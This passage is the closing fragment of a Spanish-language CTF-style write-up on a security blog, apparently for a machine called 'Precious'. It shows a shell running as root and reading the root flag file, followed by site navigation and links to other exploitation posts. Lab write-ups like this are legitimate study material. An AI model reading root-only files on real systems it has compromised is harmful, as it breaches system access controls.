<p>Y ya somos root:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash-5.1# <span class="nb">whoami
</span>root
bash-5.1# <span class="nb">cat</span> /root/root.txt 
95ff0867c3156b05a0f2d49fc6b1ba48
</code></pre></div></div>

<p>Eso ha sido todo, gracias por leer ❤</p>

<p><img src="/assets/img/precious/waifu.gif" alt=""></p>


    </div>
    
    
</article>
<div class="post-nav">
<a class="previous" href="/explotacion%20binaria/2022/12/20/prng-bad-seeds.html" title="Explotanto un PRNG bad seed">Explotanto un PRNG bad seed</a><a class="next" href="/2023/01/04/picoCTF-web-gauntlet.html" title="picoCTF web gauntlet - sql injection y evadiendo filtros">picoCTF web gauntlet - sql injection...</a>
</div>
<div class="post-related">
      <div>Related Articles</div>
      <ul>
        <li><a class="post-link" href="/explotacion%20binaria/2023/04/24/rop-emporium-callme.html" title="picoCTF web gauntlet - sql injection y evadiendo filtros">ROP emporium callme - Llamando multiples funciones</a></li>
<li><a class="post-link" href="/explotacion%20binaria/2023/02/26/bypassNX-mprotect.html" title="picoCTF web gauntlet - sql injection y evadiendo filtros">Bypass NX usando mprotect() en x64</a></li>
<li><a class="post-link" href="/explotacion%20binaria/2022/08/03/leak-stack-canary.html" title="picoCTF web gauntlet - sql injection y evadiendo filtros">Leak stack canary - bypass</a></li>
<li><a class="post-link" href="/2023/06/28/xxs-reflejado.html" title="picoCTF web gauntlet - sql injection y evadiendo filtros">Simple XSS reflejado en un sitio web real</a></li>
</ul>
    </div>
<div class="post-comments"></div></section>
  
<script src="https://unpkg.com/vanilla-back-to-top@7.2.1/dist/vanilla-back-to-top.min.js"></script>
<script>addBackToTop({
  diameter: 56,
  backgroundColor: '#ff5100',
  textColor: '#fff'
})</script>
  
  
</div>


  </section>
  <section class="sidebar" style="margin-left: 15px;">
    <!-- Get sidebar items --></section>
</div>

<script src="https://unpkg.com/vanilla-back-to-top@7.2.1/dist/vanilla-back-to-top.min.js"></script>
<script>addBackToTop({
  diameter: 56,
  backgroundColor: '#ff5100',
  textColor: '#fff'
})</script>
      </div>
    </main><footer class="site-footer h-card">
  <data class="u-url" href="/"></data>

  <div align="center" class="wrapper">
    <div class="site-footer-inner">
<div class="footer-col rss-subscribe">
	  <font size="1" color="gray">
	  <!--RSS SVG-->
   	<svg aria-hidden="true" fill="#ff4e00" height="12" width="12" viewbox="0 0 16 16" version="1.1" data-view-component="true" class="octicon octicon-rss mr-1">
    <path fill-rule="evenodd" d="M2.002 2.725a.75.75 0 01.797-.699C8.79 2.42 13.58 7.21 13.974 13.201a.75.75 0 11-1.497.098 10.502 10.502 0 00-9.776-9.776.75.75 0 01-.7-.798zM2 13a1 1 0 112 0 1 1 0 01-2 0zm.84-5.95a.75.75 0 00-.179 1.489c2.509.3 4.5 2.291 4.8 4.8a.75.75 0 101.49-.178A7.003 7.003 0 002.838 7.05z"></path>
    </svg>
	  <a href="/feed.xml" target="_blank"> RSS </a>订阅 |  
    <!--提供支持-->
    由 <a title="Jekyll is a simple, blog-aware, static site
    generator." href="http://jekyllrb.com/" target="_blank">Jekyll</a> &amp; <a title="Yat, yet
    another theme." href="https://github.com/jeffreytse/jekyll-theme-yat" target="_blank">Yat Theme</a>提供支持
	  </font>
</div>

    <!--版权-->
    <div>
    <font size="1" color="gray">
    Copyright © 2017-2023 <a href="https://github.com/ic4rta/">c4rta</a> All Rights Reserved
    </font>
</div>

      <!--logo
  <div>

    <a href="https://github.com/vanhiupun" target="_blank">
      <img src="https://visitor-badge.glitch.me/badge?page_id=vanhiupun.visitor-badge&right_color=Orange" alt="visitor" />
    </a> 
	    
    <a href="https://github.com/vanhiupun/Vanhiupun.github.io/actions/workflows/jekyll.yml" target="_blank">
        <img src="https://github.com/vanhiupun/Vanhiupun.github.io/actions/workflows/jekyll.yml/badge.svg" />
    </a>
      
    <a href="https://github.com/vanhiupun/Vanhiupun.github.io/actions/workflows/codeql-analysis.yml" target="_blank">
      <img src="https://github.com/vanhiupun/Vanhiupun.github.io/actions/workflows/codeql-analysis.yml/badge.svg">
    </a> 
      
    <a href="https://github.com/vanhiupun/Vanhiupun.github.io" target="_blank">
      <img src="https://www.codefactor.io/repository/github/vanhiupun/vanhiupun.github.io/badge" alt="CodeFactor" />
    </a>
    
    <a href="https://codeclimate.com/github/vanhiupun/Vanhiupun.github.io/maintainability">
      <img src="https://api.codeclimate.com/v1/badges/708da11ffb90a8f6f13b/maintainability" alt="maintainability" />
    </a>
    
    <a href="https://rubygems.org/gems/jekyll-theme-yat" target="_blank">
        <img src="https://badge.fury.io/rb/jekyll-theme-yat.svg"     alt="jekyll-theme-yat" />
    </a> 
    
    <a href="https://github.com/vanhiupun" target="_blank">
        <img src="https://img.shields.io/badge/Github%20Repository-222222?style=flat-square&logo=github&logoColor=ffffff" alt="Github" />
    </a> 
          
    <a href="https://vanhiupun.github.io" target="_blank">
        <img src="https://img.shields.io/badge/Github%20Page-222222?style=flat-square&logo=github&logoColor=ffffff" alt="Blog" />
    </a> 
          
    <a href="mailto:fanxiaobin422@gmail.com" target="_blank">
        <img src="https://img.shields.io/badge/Send%20me%20Gmail-EA4335?style=flat-square&logo=Gmail&logoColor=ffffff" alt="Gmail" />
    </a> 
          
    <a href="https://github.com/vanhiupun/Vanhiupun.github.io/blob/c0c037532393ee2718892f87b200a0bbe33e7eb9/License" target="_blank">
        <img src="https://img.shields.io/badge/License%20MIT-f2cb05?style=flat-square&logo=Mitsubishi&logoColor=222222" alt="MIT" />
    </a>
          
    <a href="http://jekyllthemes.org/" target="_blank">
        <img src="https://img.shields.io/badge/Jekyll%20Themes-f2cb05?style=flat-square&logo=Jekyll&logoColor=222222" alt="jekyll-themes" />
    </a> 
    
    <a href="https://github.com/jeffreytse/jekyll-theme-yat" target="_blank">
        <img src="https://img.shields.io/badge/Jekyll%C2%B7Theme%C2%B7Yat-f2cb05?style=flat-square&logo=github&logoColor=181717" alt="Jekyll-yat" />
    </a> 
      
    <a href="https://raw.githubusercontent.com/vanhiupun/Vanhiupun.github.io/master/assets/images/img/zz.png" target="_blank">
        <img src="https://img.shields.io/badge/GitHub%20Sponsors-EA4335?style=flat-square&logo=GitHub%20Sponsors&logoColor=222222" alt="/GitHub%20Sponsors" />
    </a> 
  </div>-->
  </div>
  </div>
</footer>
</body>
</html><html>
<script src="https://unpkg.com/vanilla-back-to-top@7.2.1/dist/vanilla-back-to-top.min.js"></script>
<script>addBackToTop({
  diameter: 56,
  backgroundColor: '#ff5100',
  textColor: '#fff'
})</script>
</html>
